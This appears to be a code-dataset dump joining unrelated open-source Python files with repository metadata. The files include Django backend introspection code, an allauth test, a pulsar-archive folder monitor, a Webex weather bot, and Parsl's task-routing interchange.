sequence_list = []
for app_config in apps.get_app_configs(only_with_models_module=True):
for model in router.get_migratable_models(app_config.models_module, self.connection.alias):
if not model._meta.managed:
continue
if model._meta.swapped:
continue
for f in model._meta.local_fields:
if isinstance(f, models.AutoField):
sequence_list.append({'table': model._meta.db_table, 'column': f.column})
break # Only one AutoField is allowed per model, so don't bother continuing.
for f in model._meta.local_many_to_many:
# If this is an m2m using an intermediate table,
# we don't need to reset the sequence.
if f.rel.through is None:
sequence_list.append({'table': f.m2m_db_table(), 'column': None})
return sequence_list
def get_key_columns(self, cursor, table_name):
"""
Backends can override this to return a list of (column_name, referenced_table_name,
referenced_column_name) for all key columns in given table.
"""
raise NotImplementedError('subclasses of BaseDatabaseIntrospection may require a get_key_columns() method')
def get_primary_key_column(self, cursor, table_name):
"""
Returns the name of the primary key column for the given table.
"""
for column in six.iteritems(self.get_indexes(cursor, table_name)):
if column[1]['primary_key']:
return column[0]
return None
def get_indexes(self, cursor, table_name):
"""
Returns a dictionary of indexed fieldname -> infodict for the given
table, where each infodict is in the format:
{'primary_key': boolean representing whether it's the primary key,
'unique': boolean representing whether it's a unique index}
Only single-column indexes are introspected.
"""
raise NotImplementedError('subclasses of BaseDatabaseIntrospection may require a get_indexes() method')
def get_constraints(self, cursor, table_name):
"""
Retrieves any constraints or keys (unique, pk, fk, check, index)
across one or more columns.
Returns a dict mapping constraint names to their attributes,
where attributes is a dict with keys:
* columns: List of columns this covers
* primary_key: True if primary key, False otherwise
* unique: True if this is a unique constraint, False otherwise
* foreign_key: (table, column) of target, or None
* check: True if check constraint, False otherwise
* index: True if index, False otherwise.
Some backends may return special constraint names that don't exist
if they don't name constraints of a certain type (e.g. SQLite)
"""
raise NotImplementedError('subclasses of BaseDatabaseIntrospection may require a get_constraints() method')
class BaseDatabaseClient(object):
"""
This class encapsulates all backend-specific methods for opening a
client shell.
"""
# This should be a string representing the name of the executable
# (e.g., "psql"). Subclasses must override this.
executable_name = None
def __init__(self, connection):
# connection is an instance of BaseDatabaseWrapper.
self.connection = connection
def runshell(self):
raise NotImplementedError('subclasses of BaseDatabaseClient must provide a runshell() method')
class BaseDatabaseValidation(object):
"""
This class encapsualtes all backend-specific model validation.
"""
def __init__(self, connection):
self.connection = connection
def validate_field(self, errors, opts, f):
"By default, there is no backend-specific validation"
pass
| 36.779045 | 129 | 0.651383 |
8f108b56cdc4b1e2a6586461ef2e4f26ccacb6b7 | 627 | py | Python | allauth/tests.py | k1000/django-allauth | e67b05fde5635f19850de73558987573c085826f | [
"MIT"
] | 1 | 2015-11-05T15:17:10.000Z | 2015-11-05T15:17:10.000Z | allauth/tests.py | k1000/django-allauth | e67b05fde5635f19850de73558987573c085826f | [
"MIT"
] | null | null | null | allauth/tests.py | k1000/django-allauth | e67b05fde5635f19850de73558987573c085826f | [
"MIT"
] | null | null | null | from django.test import TestCase
from django.core.urlresolvers import reverse
import utils
class BasicTests(TestCase):
def test_email_validation(self):
s = 'unfortunately.django.user.email.max_length.is.set.to.75.which.is.too.short@bummer.com'
self.assertEquals(None, utils.valid_email_or_none(s))
s = 'this.email.address.is.a.bit.too.long.but.should.still.validate.ok@short.com'
self.assertEquals(s, utils.valid_email_or_none(s))
s = 'x'+s
self.assertEquals(None, utils.valid_email_or_none(s))
self.assertEquals(None, utils.valid_email_or_none("Bad ?"))
| 36.882353 | 99 | 0.709729 |
c18ade9fa815f2e610855f467d72c76ccae53bfd | 3,707 | py | Python | scripts/archive_directory_monitor.py | steve-ord/psrchive-docker | 4d7e1150f2f5af541242b7977ef4654b7623293e | [
"MIT"
] | null | null | null | scripts/archive_directory_monitor.py | steve-ord/psrchive-docker | 4d7e1150f2f5af541242b7977ef4654b7623293e | [
"MIT"
] | null | null | null | scripts/archive_directory_monitor.py | steve-ord/psrchive-docker | 4d7e1150f2f5af541242b7977ef4654b7623293e | [
"MIT"
] | null | null | null | import logging
import signal
import sys
import shlex
import shutil
import os
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
from subprocess import Popen, PIPE
log = logging.getLogger("archive_directory_monitor")
class ArchiveAdder(FileSystemEventHandler):
def __init__(self,output_dir):
super(ArchiveAdder,self).__init__()
self.output_dir = output_dir
self.first_file = True
def _syscall(self,cmd):
log.debug("Calling: {}".format(cmd))
proc = Popen(shlex.split(cmd),stdout=PIPE,stderr=PIPE)
proc.wait()
if proc.returncode != 0:
log.error(proc.stderr.read())
else:
log.debug("Call success")
def fscrunch(self,fname):
self._syscall("pam -F -e fscrunch {}".format(fname))
return fname.replace(".ar",".fscrunch")
def process(self,fname):
fscrunch_fname = self.fscrunch(fname)
if self.first_file:
log.debug("First file in set. Copying to sum.?scrunch.")
shutil.copy2(fscrunch_fname,"sum.fscrunch")
shutil.copy2(fname,"sum.tscrunch")
self.first_file = False
else:
self._syscall("psradd -T -inplace sum.tscrunch {}".format(fname))
self._syscall("psradd -inplace sum.fscrunch {}".format(fscrunch_fname))
os.remove(fscrunch_fname)
shutil.copy2("sum.fscrunch",self.output_dir)
shutil.copy2("sum.tscrunch",self.output_dir)
def on_created(self, event):
log.debug("New file created: {}".format(event.src_path))
try:
fname = event.src_path
if fname.endswith(".ar"):
log.debug("Passing archive file for processing")
self.process(fname)
except Exception as error:
log.error(error)
def main(input_dir,output_dir,handler):
observer = Observer()
observer.daemon = False
log.debug("Input directory: {}".format(input_dir))
log.debug("Output directory: {}".format(output_dir))
log.debug("Setting up ArchiveAdder handler")
observer.schedule(handler, input_dir, recursive=False)
def shutdown(sig,func):
log.debug("Signal handler called on signal: {}".format(sig))
observer.stop()
observer.join()
sys.exit()
log.debug("Setting SIGTERM and SIGINT handler")
signal.signal(signal.SIGTERM,shutdown)
signal.signal(signal.SIGINT,shutdown)
log.debug("Starting directory monitor")
observer.start()
log.debug("Parent thread entering 1 second polling loop")
while not observer.stopped_event.wait(1):
pass
if __name__ == "__main__":
from argparse import ArgumentParser
FORMAT = "[ %(levelname)s - %(asctime)s - %(filename)s:%(lineno)s] %(message)s"
logger = logging.getLogger('archive_directory_monitor')
logging.basicConfig(format=FORMAT)
logger.setLevel(logging.DEBUG)
usage = "usage: {prog} [options]".format(prog=sys.argv[0])
parser = ArgumentParser(usage=usage)
parser.add_argument("-i","--input_dir",type=str,
help="The directory to monitor for new files",
required=True)
parser.add_argument("-o","--output_dir",type=str,
help="The directory to output results to",
required=True)
parser.add_argument("-m","--mode",type=str,
help="Processing mode to operate in",
default="ArchiveAdder")
args = parser.parse_args()
if args.mode == "ArchiveAdder":
handler = ArchiveAdder(args.output_dir)
else:
log.error("Processing mode {} is not supported.".format(args.mode))
sys.exit(-1)
main(args.input_dir,args.output_dir,handler)
| 34.009174 | 83 | 0.650661 |
94ca0f21cfa0c822072a772ee71d7b4d43649124 | 445 | py | Python | demo_path_routing_auth/urls.py | mccalluc/django_docker_engine | 2f8241ef9b504e89de54bb5f18ef3c925adea116 | [
"MIT"
] | 7 | 2017-04-25T10:22:53.000Z | 2021-09-11T10:18:04.000Z | demo_path_routing_auth/urls.py | django-africa/django_docker_engine | 2f8241ef9b504e89de54bb5f18ef3c925adea116 | [
"MIT"
] | 117 | 2017-03-22T19:24:24.000Z | 2021-03-25T21:57:53.000Z | demo_path_routing_auth/urls.py | mccalluc/django_docker_engine | 2f8241ef9b504e89de54bb5f18ef3c925adea116 | [
"MIT"
] | 3 | 2018-05-23T10:00:06.000Z | 2020-03-05T05:56:02.000Z | from django.conf.urls import include, url
from . import views
urlpatterns = [
url(r'^$', views.index),
url(r'^login/$', views.login),
url(r'^logout/$', views.logout),
url(r'^launch/$', views.launch),
url(r'^kill/(.*)$', views.kill),
url(r'^logs/(.*)$', views.logs),
url(r'^history/(.*)$', views.history),
url(r'^upload/(.*)$', views.upload),
url(r'^docker/', include(__package__ + '.proxy_url_patterns'))
]
| 27.8125 | 66 | 0.582022 |
194220590a21afb901acec0403ece7cae9bdce0c | 738 | py | Python | examples/introduction.to.programming.with.turtle/for_all/6-2-3.very.step.and.turn.py | strakam/PyEasyGraphics | 57a586aa92385d26725d4ec3d61b2bbbe970195d | [
"BSD-3-Clause"
] | 5 | 2019-09-23T05:15:47.000Z | 2021-01-17T08:06:47.000Z | examples/introduction.to.programming.with.turtle/for_all/6-2-3.very.step.and.turn.py | strakam/PyEasyGraphics | 57a586aa92385d26725d4ec3d61b2bbbe970195d | [
"BSD-3-Clause"
] | 3 | 2019-05-03T05:25:17.000Z | 2021-04-15T04:53:16.000Z | examples/introduction.to.programming.with.turtle/for_all/6-2-3.very.step.and.turn.py | strakam/PyEasyGraphics | 57a586aa92385d26725d4ec3d61b2bbbe970195d | [
"BSD-3-Clause"
] | 4 | 2019-05-04T13:42:40.000Z | 2021-04-15T10:38:48.000Z | from easygraphics.turtle import *
from easygraphics import *
import math
import sys
def distance(x1, y1, x2, y2):
dx = x2 - x1
dy = y2 - y1
return math.hypot(dx, dy)
def factor(x, y):
d = distance(get_x(), get_y(), x, y)
if d < 1:
return 1
return 1 / d
def vary_step(x, y, side, angle):
while is_run():
fd(factor(x, y) * side)
lt(angle)
def vary_turn(x, y, side, angle):
while is_run():
fd(side)
lt(factor(x, y) * angle);
def main():
create_world(1024, 768)
set_speed(100)
setxy(100, 100)
set_fill_color("red")
fill_circle(0, 0, 4)
# vary_step(0,0,1500,10)
vary_turn(0, 0, 10, 2000)
pause()
close_world()
easy_run(main) | 17.162791 | 40 | 0.571816 |
2b86755125eb1c2790d65966028982cb59146379 | 1,973 | py | Python | simple-webex-chatbot/weather.py | 0x2142/example-scripts | 1db386d0eb1af89d9b7da8fe667d9b5526b3001c | [
"Unlicense"
] | 2 | 2020-11-09T20:04:08.000Z | 2021-04-08T09:39:56.000Z | simple-webex-chatbot/weather.py | 0x2142/example-scripts | 1db386d0eb1af89d9b7da8fe667d9b5526b3001c | [
"Unlicense"
] | 1 | 2022-02-06T02:53:42.000Z | 2022-02-07T18:52:26.000Z | simple-webex-chatbot/weather.py | 0x2142/example-scripts | 1db386d0eb1af89d9b7da8fe667d9b5526b3001c | [
"Unlicense"
] | 3 | 2021-02-25T08:31:08.000Z | 2022-03-24T14:54:36.000Z | import json
import logging
import requests
from webex_bot.models.command import Command
log = logging.getLogger(__name__)
# Get a free account at openweathermap.org &
# insert API key here:
OPENWEATHER_KEY = ""
class WeatherByZIP(Command):
def __init__(self):
# Define custom command info here
# command_keyword = what chat keyword will trigger this command to execute
# help_message = what message is returned when user sends 'help' message
# card = optionally send an AdaptiveCard response
super().__init__(
command_keyword="weather",
help_message="Get current weather conditions by ZIP code.",
card=None,
)
def execute(self, message, attachment_actions):
# By default, command keyword will be stripped out before being passed to execute function
# For example, If user sends "weather 12345", then message variable will be " 12345"
# Need to strip the additional whitespace around the input:
zip_code = message.strip()
# Define our URL, with desired parameters: ZIP code, units, and API Key
url = "https://api.openweathermap.org/data/2.5/weather?"
url += f"zip={zip_code}&units=imperial&appid={OPENWEATHER_KEY}"
# Query weather
response = requests.get(url)
weather = response.json()
# Pull out desired info
city = weather["name"]
conditions = weather["weather"][0]["description"]
temperature = weather["main"]["temp"]
humidity = weather["main"]["humidity"]
wind = weather["wind"]["speed"]
# Format message that will be sent back to the user
response_message = (
f"In {city}, it's currently {temperature}F with {conditions}. "
)
response_message += f"Wind speed is {wind}mph. Humidity is {humidity}%"
# Message returned will be sent back to the user by bot
return response_message
| 35.872727 | 98 | 0.650786 |
4225a8def7e48178f959f1b2f13994c352736683 | 875 | py | Python | backend/wallet/api/v1/serializers.py | crowdbotics-apps/test-30107 | c9c9e1338ac2fd286bead4b401144755699217c5 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/wallet/api/v1/serializers.py | crowdbotics-apps/test-30107 | c9c9e1338ac2fd286bead4b401144755699217c5 | [
"FTL",
"AML",
"RSA-MD"
] | 15 | 2021-08-30T03:24:39.000Z | 2022-03-13T17:39:16.000Z | backend/wallet/api/v1/serializers.py | crowdbotics-apps/test-30107 | c9c9e1338ac2fd286bead4b401144755699217c5 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | from rest_framework import serializers
from wallet.models import (
PaymentTransaction,
TaskerPaymentAccount,
TaskerWallet,
PaymentMethod,
CustomerWallet,
)
class TaskerPaymentAccountSerializer(serializers.ModelSerializer):
class Meta:
model = TaskerPaymentAccount
fields = "__all__"
class TaskerWalletSerializer(serializers.ModelSerializer):
class Meta:
model = TaskerWallet
fields = "__all__"
class PaymentTransactionSerializer(serializers.ModelSerializer):
class Meta:
model = PaymentTransaction
fields = "__all__"
class CustomerWalletSerializer(serializers.ModelSerializer):
class Meta:
model = CustomerWallet
fields = "__all__"
class PaymentMethodSerializer(serializers.ModelSerializer):
class Meta:
model = PaymentMethod
fields = "__all__"
| 22.435897 | 66 | 0.717714 |
d181d018bf69ddc1d5572f803685a599400f01bf | 29,861 | py | Python | parsl/executors/high_throughput/interchange.py | jmoon1506/parsl | f4070799a07f314b09b255689972534059fc746e | [
"Apache-2.0"
] | null | null | null | parsl/executors/high_throughput/interchange.py | jmoon1506/parsl | f4070799a07f314b09b255689972534059fc746e | [
"Apache-2.0"
] | null | null | null | parsl/executors/high_throughput/interchange.py | jmoon1506/parsl | f4070799a07f314b09b255689972534059fc746e | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import argparse
import zmq
import os
import sys
import platform
import random
import time
import datetime
import pickle
import logging
import queue
import threading
import json
from parsl.version import VERSION as PARSL_VERSION
from parsl.serialize import ParslSerializer
serialize_object = ParslSerializer().serialize
from parsl.app.errors import RemoteExceptionWrapper
from parsl.monitoring.message_type import MessageType
from parsl.process_loggers import wrap_with_logs
HEARTBEAT_CODE = (2 ** 32) - 1
PKL_HEARTBEAT_CODE = pickle.dumps((2 ** 32) - 1)
class ShutdownRequest(Exception):
''' Exception raised when any async component receives a ShutdownRequest
'''
def __init__(self):
self.tstamp = time.time()
def __repr__(self):
return "Shutdown request received at {}".format(self.tstamp)
def __str__(self):
return self.__repr__()
class ManagerLost(Exception):
''' Task lost due to manager loss. Manager is considered lost when multiple heartbeats
have been missed.
'''
def __init__(self, manager_id, hostname):
self.manager_id = manager_id
self.tstamp = time.time()
self.hostname = hostname
def __repr__(self):
return "Task failure due to loss of manager {} on host {}".format(self.manager_id.decode(), self.hostname)
def __str__(self):
return self.__repr__()
class BadRegistration(Exception):
''' A new Manager tried to join the executor with a BadRegistration message
'''
def __init__(self, worker_id, critical=False):
self.worker_id = worker_id
self.tstamp = time.time()
self.handled = "critical" if critical else "suppressed"
def __repr__(self):
return "Manager {} attempted to register with a bad registration message. Caused a {} failure".format(
self.worker_id,
self.handled)
def __str__(self):
return self.__repr__()
class VersionMismatch(Exception):
''' Manager and Interchange versions do not match
'''
def __init__(self, interchange_version, manager_version):
self.interchange_version = interchange_version
self.manager_version = manager_version
def __repr__(self):
return "Manager version info {} does not match interchange version info {}, causing a critical failure".format(
self.interchange_version,
self.manager_version)
def __str__(self):
return self.__repr__()
class Interchange(object):
""" Interchange is a task orchestrator for distributed systems.
1. Asynchronously queue large volume of tasks (>100K)
2. Allow for workers to join and leave the union
3. Detect workers that have failed using heartbeats
4. Service single and batch requests from workers
5. Be aware of requests worker resource capacity,
eg. schedule only jobs that fit into walltime.
TODO: We most likely need a PUB channel to send out global commands, like shutdown
"""
def __init__(self,
client_address="127.0.0.1",
interchange_address="127.0.0.1",
client_ports=(50055, 50056, 50057),
worker_ports=None,
worker_port_range=(54000, 55000),
hub_address=None,
hub_port=None,
heartbeat_threshold=60,
logdir=".",
logging_level=logging.INFO,
poll_period=10,
):
"""
Parameters
----------
client_address : str
The ip address at which the parsl client can be reached. Default: "127.0.0.1"
interchange_address : str
The ip address at which the workers will be able to reach the Interchange. Default: "127.0.0.1"
client_ports : triple(int, int, int)
The ports at which the client can be reached
worker_ports : tuple(int, int)
The specific two ports at which workers will connect to the Interchange. Default: None
worker_port_range : tuple(int, int)
The interchange picks ports at random from the range which will be used by workers.
This is overridden when the worker_ports option is set. Default: (54000, 55000)
hub_address : str
The ip address at which the interchange can send info about managers to when monitoring is enabled.
This is passed via dfk and executor automatically. Default: None (meaning monitoring disabled)
hub_port : str
The port at which the interchange can send info about managers to when monitoring is enabled.
This is passed via dfk and executor automatically. Default: None (meaning monitoring disabled)
heartbeat_threshold : int
Number of seconds since the last heartbeat after which worker is considered lost.
logdir : str
Parsl log directory paths. Logs and temp files go here. Default: '.'
logging_level : int
Logging level as defined in the logging module. Default: logging.INFO (20)
poll_period : int
The main thread polling period, in milliseconds. Default: 10ms
"""
self.logdir = logdir
os.makedirs(self.logdir, exist_ok=True)
start_file_logger("{}/interchange.log".format(self.logdir), level=logging_level)
logger.debug("Initializing Interchange process")
self.client_address = client_address
self.interchange_address = interchange_address
self.poll_period = poll_period
logger.info("Attempting connection to client at {} on ports: {},{},{}".format(
client_address, client_ports[0], client_ports[1], client_ports[2]))
self.context = zmq.Context()
self.task_incoming = self.context.socket(zmq.DEALER)
self.task_incoming.set_hwm(0)
self.task_incoming.RCVTIMEO = 10 # in milliseconds
self.task_incoming.connect("tcp://{}:{}".format(client_address, client_ports[0]))
self.results_outgoing = self.context.socket(zmq.DEALER)
self.results_outgoing.set_hwm(0)
self.results_outgoing.connect("tcp://{}:{}".format(client_address, client_ports[1]))
self.command_channel = self.context.socket(zmq.REP)
self.command_channel.RCVTIMEO = 1000 # in milliseconds
self.command_channel.connect("tcp://{}:{}".format(client_address, client_ports[2]))
logger.info("Connected to client")
self.hub_address = hub_address
self.hub_port = hub_port
self.pending_task_queue = queue.Queue(maxsize=10 ** 6)
self.worker_ports = worker_ports
self.worker_port_range = worker_port_range
self.task_outgoing = self.context.socket(zmq.ROUTER)
self.task_outgoing.set_hwm(0)
self.results_incoming = self.context.socket(zmq.ROUTER)
self.results_incoming.set_hwm(0)
if self.worker_ports:
self.worker_task_port = self.worker_ports[0]
self.worker_result_port = self.worker_ports[1]
self.task_outgoing.bind("tcp://*:{}".format(self.worker_task_port))
self.results_incoming.bind("tcp://*:{}".format(self.worker_result_port))
else:
self.worker_task_port = self.task_outgoing.bind_to_random_port('tcp://*',
min_port=worker_port_range[0],
max_port=worker_port_range[1], max_tries=100)
self.worker_result_port = self.results_incoming.bind_to_random_port('tcp://*',
min_port=worker_port_range[0],
max_port=worker_port_range[1], max_tries=100)
logger.info("Bound to ports {},{} for incoming worker connections".format(
self.worker_task_port, self.worker_result_port))
self._ready_manager_queue = {}
self.heartbeat_threshold = heartbeat_threshold
self.current_platform = {'parsl_v': PARSL_VERSION,
'python_v': "{}.{}.{}".format(sys.version_info.major,
sys.version_info.minor,
sys.version_info.micro),
'os': platform.system(),
'hostname': platform.node(),
'dir': os.getcwd()}
logger.info("Platform info: {}".format(self.current_platform))
def get_tasks(self, count):
""" Obtains a batch of tasks from the internal pending_task_queue
Parameters
----------
count: int
Count of tasks to get from the queue
Returns
-------
List of upto count tasks. May return fewer than count down to an empty list
eg. [{'task_id':<x>, 'buffer':<buf>} ... ]
"""
tasks = []
for i in range(0, count):
try:
x = self.pending_task_queue.get(block=False)
except queue.Empty:
break
else:
tasks.append(x)
return tasks
@wrap_with_logs(target="interchange")
def migrate_tasks_to_internal(self, kill_event):
"""Pull tasks from the incoming tasks 0mq pipe onto the internal
pending task queue
Parameters:
-----------
kill_event : threading.Event
Event to let the thread know when it is time to die.
"""
logger.info("[TASK_PULL_THREAD] Starting")
task_counter = 0
poller = zmq.Poller()
poller.register(self.task_incoming, zmq.POLLIN)
while not kill_event.is_set():
try:
msg = self.task_incoming.recv_pyobj()
except zmq.Again:
# We just timed out while attempting to receive
logger.debug("[TASK_PULL_THREAD] {} tasks in internal queue".format(self.pending_task_queue.qsize()))
continue
if msg == 'STOP':
kill_event.set()
break
else:
self.pending_task_queue.put(msg)
task_counter += 1
logger.debug("[TASK_PULL_THREAD] Fetched task:{}".format(task_counter))
def _create_monitoring_channel(self):
if self.hub_address and self.hub_port:
logger.info("Connecting to monitoring")
hub_channel = self.context.socket(zmq.DEALER)
hub_channel.set_hwm(0)
hub_channel.connect("tcp://{}:{}".format(self.hub_address, self.hub_port))
logger.info("Monitoring enabled and connected to hub")
return hub_channel
else:
return None
def _send_monitoring_info(self, hub_channel, manager):
if hub_channel:
logger.info("Sending message {} to hub".format(self._ready_manager_queue[manager]))
hub_channel.send_pyobj((MessageType.NODE_INFO,
datetime.datetime.now(),
self._ready_manager_queue[manager]))
@wrap_with_logs(target="interchange")
def _command_server(self, kill_event):
""" Command server to run async command to the interchange
"""
logger.debug("[COMMAND] Command Server Starting")
# Need to create a new ZMQ socket for command server thread
hub_channel = self._create_monitoring_channel()
while not kill_event.is_set():
try:
command_req = self.command_channel.recv_pyobj()
logger.debug("[COMMAND] Received command request: {}".format(command_req))
if command_req == "OUTSTANDING_C":
outstanding = self.pending_task_queue.qsize()
for manager in self._ready_manager_queue:
outstanding += len(self._ready_manager_queue[manager]['tasks'])
reply = outstanding
elif command_req == "WORKERS":
num_workers = 0
for manager in self._ready_manager_queue:
num_workers += self._ready_manager_queue[manager]['worker_count']
reply = num_workers
elif command_req == "MANAGERS":
reply = []
for manager in self._ready_manager_queue:
idle_duration = 0
if self._ready_manager_queue[manager]['idle_since'] is not None:
idle_duration = time.time() - self._ready_manager_queue[manager]['idle_since']
resp = {'manager': manager.decode('utf-8'),
'block_id': self._ready_manager_queue[manager]['block_id'],
'worker_count': self._ready_manager_queue[manager]['worker_count'],
'tasks': len(self._ready_manager_queue[manager]['tasks']),
'idle_duration': idle_duration,
'active': self._ready_manager_queue[manager]['active']}
reply.append(resp)
elif command_req.startswith("HOLD_WORKER"):
cmd, s_manager = command_req.split(';')
manager = s_manager.encode('utf-8')
logger.info("[CMD] Received HOLD_WORKER for {}".format(manager))
if manager in self._ready_manager_queue:
self._ready_manager_queue[manager]['active'] = False
reply = True
self._send_monitoring_info(hub_channel, manager)
else:
reply = False
elif command_req == "SHUTDOWN":
logger.info("[CMD] Received SHUTDOWN command")
kill_event.set()
reply = True
else:
reply = None
logger.debug("[COMMAND] Reply: {}".format(reply))
self.command_channel.send_pyobj(reply)
except zmq.Again:
logger.debug("[COMMAND] is alive")
continue
def start(self, poll_period=None):
""" Start the interchange
Parameters:
----------
TODO: Move task receiving to a thread
"""
logger.info("Incoming ports bound")
hub_channel = self._create_monitoring_channel()
if poll_period is None:
poll_period = self.poll_period
start = time.time()
count = 0
self._kill_event = threading.Event()
self._task_puller_thread = threading.Thread(target=self.migrate_tasks_to_internal,
args=(self._kill_event,),
name="Interchange-Task-Puller")
self._task_puller_thread.start()
self._command_thread = threading.Thread(target=self._command_server,
args=(self._kill_event,),
name="Interchange-Command")
self._command_thread.start()
poller = zmq.Poller()
# poller.register(self.task_incoming, zmq.POLLIN)
poller.register(self.task_outgoing, zmq.POLLIN)
poller.register(self.results_incoming, zmq.POLLIN)
# These are managers which we should examine in an iteration
# for scheduling a job (or maybe any other attention?).
# Anything altering the state of the manager should add it
# onto this list.
interesting_managers = set()
while not self._kill_event.is_set():
self.socks = dict(poller.poll(timeout=poll_period))
# Listen for requests for work
if self.task_outgoing in self.socks and self.socks[self.task_outgoing] == zmq.POLLIN:
logger.debug("[MAIN] starting task_outgoing section")
message = self.task_outgoing.recv_multipart()
manager = message[0]
if manager not in self._ready_manager_queue:
reg_flag = False
try:
msg = json.loads(message[1].decode('utf-8'))
msg['reg_time'] = datetime.datetime.strptime(msg['reg_time'], "%Y-%m-%d %H:%M:%S")
reg_flag = True
except Exception:
logger.warning("[MAIN] Got Exception reading registration message from manager: {}".format(
manager), exc_info=True)
logger.debug("[MAIN] Message :\n{}\n".format(message[0]))
else:
# We set up an entry only if registration works correctly
self._ready_manager_queue[manager] = {'last_heartbeat': time.time(),
'idle_since': time.time(),
'free_capacity': 0,
'block_id': None,
'max_capacity': 0,
'worker_count': 0,
'active': True,
'tasks': []}
if reg_flag is True:
interesting_managers.add(manager)
logger.info("[MAIN] Adding manager: {} to ready queue".format(manager))
self._ready_manager_queue[manager].update(msg)
logger.info("[MAIN] Registration info for manager {}: {}".format(manager, msg))
self._send_monitoring_info(hub_channel, manager)
if (msg['python_v'].rsplit(".", 1)[0] != self.current_platform['python_v'].rsplit(".", 1)[0] or
msg['parsl_v'] != self.current_platform['parsl_v']):
logger.warning("[MAIN] Manager {} has incompatible version info with the interchange".format(manager))
logger.debug("Setting kill event")
self._kill_event.set()
e = VersionMismatch("py.v={} parsl.v={}".format(self.current_platform['python_v'].rsplit(".", 1)[0],
self.current_platform['parsl_v']),
"py.v={} parsl.v={}".format(msg['python_v'].rsplit(".", 1)[0],
msg['parsl_v'])
)
result_package = {'task_id': -1, 'exception': serialize_object(e)}
pkl_package = pickle.dumps(result_package)
self.results_outgoing.send(pkl_package)
logger.warning("[MAIN] Sent failure reports, unregistering manager")
else:
logger.info("[MAIN] Manager {} has compatible Parsl version {}".format(manager, msg['parsl_v']))
logger.info("[MAIN] Manager {} has compatible Python version {}".format(manager,
msg['python_v'].rsplit(".", 1)[0]))
else:
# Registration has failed.
logger.debug("[MAIN] Suppressing bad registration from manager:{}".format(
manager))
else:
tasks_requested = int.from_bytes(message[1], "little")
self._ready_manager_queue[manager]['last_heartbeat'] = time.time()
if tasks_requested == HEARTBEAT_CODE:
logger.debug("[MAIN] Manager {} sent heartbeat".format(manager))
self.task_outgoing.send_multipart([manager, b'', PKL_HEARTBEAT_CODE])
else:
logger.debug("[MAIN] Manager {} requested {} tasks".format(manager, tasks_requested))
self._ready_manager_queue[manager]['free_capacity'] = tasks_requested
interesting_managers.add(manager)
logger.debug("[MAIN] leaving task_outgoing section")
# If we had received any requests, check if there are tasks that could be passed
logger.debug("Managers count (interesting/total): {interesting}/{total}".format(
total=len(self._ready_manager_queue),
interesting=len(interesting_managers)))
if interesting_managers and not self.pending_task_queue.empty():
shuffled_managers = list(interesting_managers)
random.shuffle(shuffled_managers)
while shuffled_managers and not self.pending_task_queue.empty(): # cf. the if statement above...
manager = shuffled_managers.pop()
tasks_inflight = len(self._ready_manager_queue[manager]['tasks'])
real_capacity = min(self._ready_manager_queue[manager]['free_capacity'],
self._ready_manager_queue[manager]['max_capacity'] - tasks_inflight)
if (real_capacity and self._ready_manager_queue[manager]['active']):
tasks = self.get_tasks(real_capacity)
if tasks:
self.task_outgoing.send_multipart([manager, b'', pickle.dumps(tasks)])
task_count = len(tasks)
count += task_count
tids = [t['task_id'] for t in tasks]
self._ready_manager_queue[manager]['free_capacity'] -= task_count
self._ready_manager_queue[manager]['tasks'].extend(tids)
self._ready_manager_queue[manager]['idle_since'] = None
logger.debug("[MAIN] Sent tasks: {} to manager {}".format(tids, manager))
if self._ready_manager_queue[manager]['free_capacity'] > 0:
logger.debug("[MAIN] Manager {} has free_capacity {}".format(manager, self._ready_manager_queue[manager]['free_capacity']))
# ... so keep it in the interesting_managers list
else:
logger.debug("[MAIN] Manager {} is now saturated".format(manager))
interesting_managers.remove(manager)
else:
interesting_managers.remove(manager)
# logger.debug("Nothing to send to manager {}".format(manager))
logger.debug("[MAIN] leaving _ready_manager_queue section, with {} managers still interesting".format(len(interesting_managers)))
else:
logger.debug("[MAIN] either no interesting managers or no tasks, so skipping manager pass")
# Receive any results and forward to client
if self.results_incoming in self.socks and self.socks[self.results_incoming] == zmq.POLLIN:
logger.debug("[MAIN] entering results_incoming section")
manager, *b_messages = self.results_incoming.recv_multipart()
if manager not in self._ready_manager_queue:
logger.warning("[MAIN] Received a result from a un-registered manager: {}".format(manager))
else:
logger.debug("[MAIN] Got {} result items in batch".format(len(b_messages)))
for b_message in b_messages:
r = pickle.loads(b_message)
try:
self._ready_manager_queue[manager]['tasks'].remove(r['task_id'])
except Exception:
# If we reach here, there's something very wrong.
logger.exception("Ignoring exception removing task_id {} for manager {} with task list {}".format(
r['task_id'],
manager,
self._ready_manager_queue[manager]['tasks']))
self.results_outgoing.send_multipart(b_messages)
logger.debug("[MAIN] Current tasks: {}".format(self._ready_manager_queue[manager]['tasks']))
if len(self._ready_manager_queue[manager]['tasks']) == 0:
self._ready_manager_queue[manager]['idle_since'] = time.time()
logger.debug("[MAIN] leaving results_incoming section")
bad_managers = [manager for manager in self._ready_manager_queue if
time.time() - self._ready_manager_queue[manager]['last_heartbeat'] > self.heartbeat_threshold]
for manager in bad_managers:
logger.debug("[MAIN] Last: {} Current: {}".format(self._ready_manager_queue[manager]['last_heartbeat'], time.time()))
logger.warning("[MAIN] Too many heartbeats missed for manager {}".format(manager))
if self._ready_manager_queue[manager]['active']:
self._ready_manager_queue[manager]['active'] = False
self._send_monitoring_info(hub_channel, manager)
for tid in self._ready_manager_queue[manager]['tasks']:
try:
raise ManagerLost(manager, self._ready_manager_queue[manager]['hostname'])
except Exception:
result_package = {'task_id': tid, 'exception': serialize_object(RemoteExceptionWrapper(*sys.exc_info()))}
pkl_package = pickle.dumps(result_package)
self.results_outgoing.send(pkl_package)
logger.warning("[MAIN] Sent failure reports, unregistering manager")
self._ready_manager_queue.pop(manager, 'None')
if manager in interesting_managers:
interesting_managers.remove(manager)
delta = time.time() - start
logger.info("Processed {} tasks in {} seconds".format(count, delta))
logger.warning("Exiting")
def start_file_logger(filename, name='interchange', level=logging.DEBUG, format_string=None):
"""Add a stream log handler.
Parameters
---------
filename: string
Name of the file to write logs to. Required.
name: string
Logger name. Default="parsl.executors.interchange"
level: logging.LEVEL
Set the logging level. Default=logging.DEBUG
- format_string (string): Set the format string
format_string: string
Format string to use.
Returns
-------
None.
"""
if format_string is None:
format_string = "%(asctime)s.%(msecs)03d %(name)s:%(lineno)d [%(levelname)s] %(message)s"
global logger
logger = logging.getLogger(name)
logger.setLevel(level)
handler = logging.FileHandler(filename)
handler.setLevel(level)
